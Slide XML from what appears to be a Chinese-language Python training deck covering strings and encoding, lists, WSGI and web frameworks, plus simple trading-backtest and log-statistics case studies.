              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008200"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>。。。。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt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555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变量之数字</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194568" y="561975"/>
            <a:ext cx="8577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中数字几乎没有限制，类型不是很确定，不像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c/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有范围。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5" y="987867"/>
            <a:ext cx="6410607" cy="30670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5" y="4062868"/>
            <a:ext cx="641060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2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gallery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13965" y="128619"/>
            <a:ext cx="399799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salt-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web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08D9D4-6AC7-4D11-B929-9E25A3876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75"/>
            <a:ext cx="9144000" cy="41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3528" y="144151"/>
            <a:ext cx="3079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WSGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>规范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004048" y="1059582"/>
            <a:ext cx="39720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概念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WSGI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提出了三个概念，应用，服务器，中间件。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应用：指可以被调用的一个对象，一般指的是包含一个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__call__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方法的对象。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服务器：指的是实现了调用应用的部分。</a:t>
            </a:r>
            <a:b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中间件：处于服务器和应用两侧，起粘合作用，具体包括：请求处理，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处理等。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5" y="658961"/>
            <a:ext cx="4620080" cy="40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3528" y="144151"/>
            <a:ext cx="3079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web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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6" y="771550"/>
            <a:ext cx="3615248" cy="19442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6" y="2715766"/>
            <a:ext cx="3298728" cy="1941954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707904" y="1059030"/>
            <a:ext cx="5112568" cy="3024887"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7918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3528" y="144151"/>
            <a:ext cx="3079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web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主流框架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872" y="670967"/>
            <a:ext cx="8462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Django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：这是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界中最流行的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MVC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构造的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框架，没有之一。很多大厂都在用，比如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Instagram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Disqus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，它是一个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All In One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的框架，从模板到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ORM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都是内嵌的，最大的特色是还自带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管理后台。把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models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定义好之后，就可以在后台管理数据了。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：它也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明星框架，特点是灵活性非常高，模板引擎则使用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Jinja2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>，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可以自定义模块，扩展非常好。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Tornado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：它的特点之一是异步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框架，适合做长连接，它不仅是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框架，还是一个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 Server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，同时提供了异步库，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facebook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，知乎。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：这是一个微框架，代码不到千行，不过很少有商业项目拿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做开发的，一般用在个人等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项目中。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Pyramid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以执行效率和快速开发能力著称．框架最有优势的地方是包含了一些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Python/Perl/Ruby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独有的特性．这个开源框架拥有不依赖平台的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MVC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架构。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Twisted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是用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实现的基于事件驱动的网络引擎框架，建立在个快速高性能引擎异步架构实现的机制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deferred object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之上。但不适合编写常规的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WebApps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，适合做做一些底层网络的开发。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417103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9484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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>简单量化交易回测系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213965" y="771550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项目名称： tick日内策略回测系统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策略逻辑：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以开盘价为基准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当最新价向上突破开盘价+longN点时（longN个最小变动价位）开多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向下跌破开盘价-shortM点时开空，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止盈止损分别为winX1和lossX2，收盘前强平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行情数据内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>日期,时间,买一价,买一量,最新价,卖一价,卖一量,成交量,持仓量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42722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06277" y="48230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115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9484"/>
            <a:ext cx="39979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案例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简单日内量化回测系统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348275" y="821033"/>
            <a:ext cx="39604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zh-CN" altLang="zh-CN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文件路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1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E:\pywork\Input\Data </a:t>
            </a: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行情文件</a:t>
            </a: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E:\pywork\Output\trading_record </a:t>
            </a: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输出记录</a:t>
            </a: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>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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zh-CN" altLang="zh-CN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源代码基础架构</a:t>
            </a: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第一部分：全局变量、保存数据的容器的初始化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第二部分：读取并保存历史数据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第三部分：策略主逻辑的计算和交易记录的输出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）参数优化列表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）初始化各个列表、参数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）遍历行情，进行开仓、平仓操作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）输出交易记录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90748"/>
            <a:ext cx="4118524" cy="18959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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="1501707"/>
            <a:ext cx="4118524" cy="994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EE6666"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="EE66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2424"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788024" y="642214"/>
            <a:ext cx="936104" cy="7753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72635" y="7712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眼睛一睁一闭，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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  <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty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  3840</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty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元赚到手了哈！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219284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27917" y="482304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116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9484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-BP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>日志采集与统计</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210100" y="559594"/>
            <a:ext cx="862360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实现要求：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j-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>BP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>每天定时落两次功能调用号调情况记录到日志里，采集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>BP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>里有关功能号调用的记录统计写库，然后统计，发邮件。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2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实现细节：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筛选出功能号调用记录。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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记录可能分散在不大于当天日期</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>最大日期的文件夹下的多个文件里。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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两大段相关功能号调用记录原则上</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>采集后面第二段记录，第二段统计</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>记录不全时，就采集前一段。</a:t>
            </a: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每天定时采集。</a:t>
            </a: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可支持重复采集。</a:t>
            </a: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j-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>支持补采。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9319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915816" y="1233549"/>
            <a:ext cx="5778401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06277" y="48230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117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972" y="699542"/>
            <a:ext cx="33789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主要实现方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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函数式编程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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使用列表存储记录，字典辅助筛选</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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引入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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模块，更详细日志输出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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引入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" kern="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zh-CN" alt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模块，实现参数控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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41" y="719297"/>
            <a:ext cx="5256584" cy="39604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4" y="2439075"/>
            <a:ext cx="3421931" cy="2240661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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13965" y="159484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-BP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>日志采集与统计</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124317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6753" y="123765"/>
            <a:ext cx="28943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latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>结 语</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty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3003798"/>
            <a:ext cx="1728192" cy="1744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" y="771550"/>
            <a:ext cx="7762256" cy="21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t="25811" r="17927" b="5889"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5854105" y="2685712"/>
            <a:ext cx="1570382" cy="1431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EEE2D6"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="EEE2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699542"/>
            <a:ext cx="3295650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0" t="19279" r="29090" b="19458"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5198122" y="1184932"/>
            <a:ext cx="1311966" cy="12837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70" y="159484"/>
            <a:ext cx="289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FZLTXIHJW--GB1-0"/>
              </a:rPr>
              <a:t>谢谢各位！！！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FZLTXIHJW--GB1-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555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变量之字符串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39067"/>
            <a:ext cx="4206779" cy="26788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2" y="635431"/>
            <a:ext cx="4011316" cy="2702395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358742" y="3350399"/>
            <a:ext cx="5905286" cy="1290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python2.X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>推荐习惯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r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文档前面声明源文件编码方式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#-*- coding:utf-8 -*-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养成字符串加上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前缀的习惯，统一编码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UTF-8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如果控制台依旧出现乱码，那多半是控制台编码不同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43" y="172958"/>
            <a:ext cx="360040" cy="3138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75389" y="3795886"/>
            <a:ext cx="1800200" cy="646331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8200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Python 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编码就是一个烂摊子！！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226909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Python3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码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952677"/>
            <a:ext cx="3024336" cy="11047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3965" y="627782"/>
            <a:ext cx="2701851" cy="4062651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s1='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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s2=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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u'abc</a:t>
            </a:r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print(type(s1),type(s2))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print(bytes(s1,encoding='utf-8'))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print(bytes(s1,encoding='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print(s1.encode('utf-8'))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print(s1.encode('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print(bytes(s2,encoding='utf-8'))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print(bytes(s2,encoding='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print(s2.encode('utf-8'))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print(s2.encode('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9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zh-CN" sz="9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9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 &lt;class '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9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9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b'\xe4\xb8\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xad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\xe6\x96\x87'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b'\xd6\xd0\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xce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\xc4‘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b'\xe4\xb8\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xad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\xe6\x96\x87'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b'\xd6\xd0\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xce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\xc4'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b'abc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b'abc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b'abc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b'abc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03218" y="639881"/>
            <a:ext cx="2664296" cy="4078039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b1=b'\xd6\xd0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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xce</a:t>
            </a:r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\xc4'</a:t>
            </a:r>
          </a:p>
          <a:p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b2=b'\xe4\xb8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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xad</a:t>
            </a:r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\xe6\x96\x87'</a:t>
            </a:r>
          </a:p>
          <a:p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b3=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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b'abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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print(type(b1),type(b3))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(b1,encoding='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(b2,encoding='utf-8'))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print(b1.decode('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print(b2.decode('utf-8'))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(b3,encoding='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(b3,encoding='utf-8'))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print(b3.decode('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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print(b3.decode('utf-8'))</a:t>
            </a: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9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'bytes'&gt; &lt;class 'bytes'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" alt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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" alt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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" alt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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" alt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altLang="zh-CN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37047" y="916329"/>
            <a:ext cx="2944940" cy="67710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bytes(s1,encoding='utf-8'))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s1.encode('utf-8')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1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非纯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字符串 编码成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encode()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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27522" y="3579862"/>
            <a:ext cx="2944940" cy="67710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(b1,encoding='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b1.decode('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解码成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1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非纯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字符串 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decode()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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773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字符串编码及切片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19206"/>
            <a:ext cx="3483475" cy="4106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8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823243" y="642524"/>
            <a:ext cx="2542318" cy="15872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91" y="625350"/>
            <a:ext cx="2549295" cy="1587289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="内容占位符 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3734995" y="2561394"/>
            <a:ext cx="5184576" cy="1121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zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mn-ea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55361" y="2355726"/>
            <a:ext cx="5275525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333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>start:end:step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]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[:]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提取从开头（默认位置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）到结尾（默认位置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-1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）的整个字符串</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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[start:]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从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start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提取到结尾</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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[:end]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从开头提取到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end - 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>start:end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]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从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start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提取到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end - 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>start:end:step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]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从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start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提取到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end-1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，每隔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step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字符提取一个字符</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin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• 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左侧第一个字符的位置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偏移量为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，右侧最后一个字符的位置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333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>偏移量为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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293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773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字符串相关处理函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="内容占位符 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3734995" y="2561394"/>
            <a:ext cx="5184576" cy="1121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zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mn-ea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685" y="1667001"/>
            <a:ext cx="422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去空格及特殊符号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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s.strip().lstrip().rstrip(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zh-CN" sz="1600" dirty="0"/>
              <a:t> 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28331" y="593340"/>
            <a:ext cx="4004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b="1" u="sng" dirty="0"/>
              <a:t>连接字符串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sStr1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sStr2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sStr1 += sStr2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sStr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> 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17180" y="2009188"/>
            <a:ext cx="3897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查找字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p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sStr1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strchr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sStr2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nPos = sStr1.index(sStr2) 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nPos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> 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868" y="634836"/>
            <a:ext cx="2528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/>
              <a:t>字符串长度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sStr1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len(sStr1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" u="sng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28331" y="3510378"/>
            <a:ext cx="34018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/>
              <a:t>查找字符串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sStr1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sStr2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cde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sStr1.find(sStr2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> 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6868" y="3486516"/>
            <a:ext cx="30796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u="sng" dirty="0"/>
              <a:t>分割字符串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ab,cde,fgh,ijk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(s.split(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zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> 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6868" y="2531002"/>
            <a:ext cx="320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 u="sng"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是否存在子串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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"sub" in  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" u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"	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="0" u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36389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变量之动态数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227510" y="630898"/>
            <a:ext cx="7382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列表是可变的顺序结构序列，它能够保存任何数据类型。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23528" y="1115844"/>
            <a:ext cx="8229600" cy="354413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400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>创建</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea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[0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2, 3, 4]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等价</a:t>
            </a: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range(5)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list of integer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[2, 7, 3.5, "Hello"]        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mixed list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[]	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   # An empty list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[2, [a, b]]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   #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嵌套列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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a + b	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   # Join two lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW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400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea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a[1] 	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 Get 2nd element (0 is first)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b[1:3]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# Return a sub-list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 = d[1][0]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# Nested lists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b[0] = 42 	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 Change an element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sum(a)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# = 9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pP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a.pop(0)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# pop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第一个数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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3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36389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列表相关操作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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275823" y="608668"/>
            <a:ext cx="4392487" cy="4107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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4830490" y="608668"/>
            <a:ext cx="4038137" cy="41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6" y="155476"/>
            <a:ext cx="309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list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>切片和列表推导式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13965" y="503899"/>
